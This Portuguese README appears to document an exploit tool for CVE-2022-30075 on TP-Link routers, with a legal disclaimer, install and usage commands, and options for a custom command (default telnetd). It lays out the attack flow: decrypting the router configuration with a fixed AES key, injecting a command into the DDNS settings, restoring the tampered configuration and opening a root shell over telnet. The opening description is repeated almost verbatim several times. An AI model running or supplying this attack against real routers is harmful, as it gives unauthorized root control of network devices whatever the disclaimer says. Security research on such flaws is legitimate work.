
TP-Link Router Authenticated RCE Exploit (CVE-2022-30075) Esta ferramenta realiza execução remota de código autenticada (Authenticated Remote Code Execution) explorando a vulnerabilidade **CVE-2022-30075** presente no TP-Link Archer AX50 e em alguns outros modelos de roteadores TP-Link.
TP-Link Router Authenticated RCE Exploit (CVE-2022-30075) Esta ferramenta utiliza a vulnerabilidade CVE-2022-30075 encontrada no TP-Link Archer AX50 e em alguns outros modelos de roteadores TP-Link para realizar execução remota de comandos autenticada (Authenticated Remote Code Execution).
Esta ferramenta utiliza a vulnerabilidade CVE-2022-30075 encontrada no TP-Link Archer AX50 e em alguns outros modelos de roteadores TP-Link para realizar execução remota de comandos autenticada (Authenticated Remote Code Execution).
**O USO DESTA FERRAMENTA EM SISTEMAS NÃO AUTORIZADOS É CRIME **
- Utilize apenas em dispositivos que você possui ou tem autorização para testar
- O uso não autorizado é ilegal e tem consequências legais
- Certifique-se de que está em conformidade com as leis locais antes de usar esta ferramenta
- Os desenvolvedores não se responsabilizam por danos decorrentes do uso indevido desta ferramenta
pip install requests pycryptodome
uso básico
python exploit.py -t 192.168.0.1 -p senha_do_roteador
uso com comando personalizado
python exploit.py -t 192.168.0.1 -p senha_do_roteador -c "touch /tmp/exploit"
apenas fazer backup e descriptografar
python exploit.py -t 192.168.0.1 -p senha_do_roteador -b
Apenas Restaurar Diretório Criptografado
python exploit.py -t 192.168.0.1 -p senha_do_roteador -r /caminho/para/diretório_descriptografado
-t | Endereço IP do roteador (obrigatório)
-p | Senha de administrador do roteador (obrigatório)
-c | Comando a ser executado (padrão: telnetd)
-b | Apenas fazer backup e descriptografar
-r | Apenas restaurar diretório criptografado
Autenticação - Login no roteador com senha de administrador
Download de Configuração - O arquivo de configuração criptografado é obtido do roteador
Descriptografia - A configuração é decifrada usando uma chave AES fixa
Injeção de Comando - O comando alvo é adicionado às configurações de DDNS
Criptografia - A configuração modificada é criptografada novamente
Restauração - A configuração falsa é carregada no roteador
Acesso - Após o roteador reiniciar, conecta-se ao shell root via telnet
Alguns minutos após o roteador reiniciar:
telnet 192.168.0.1
com este comando você pode acessar o shell root.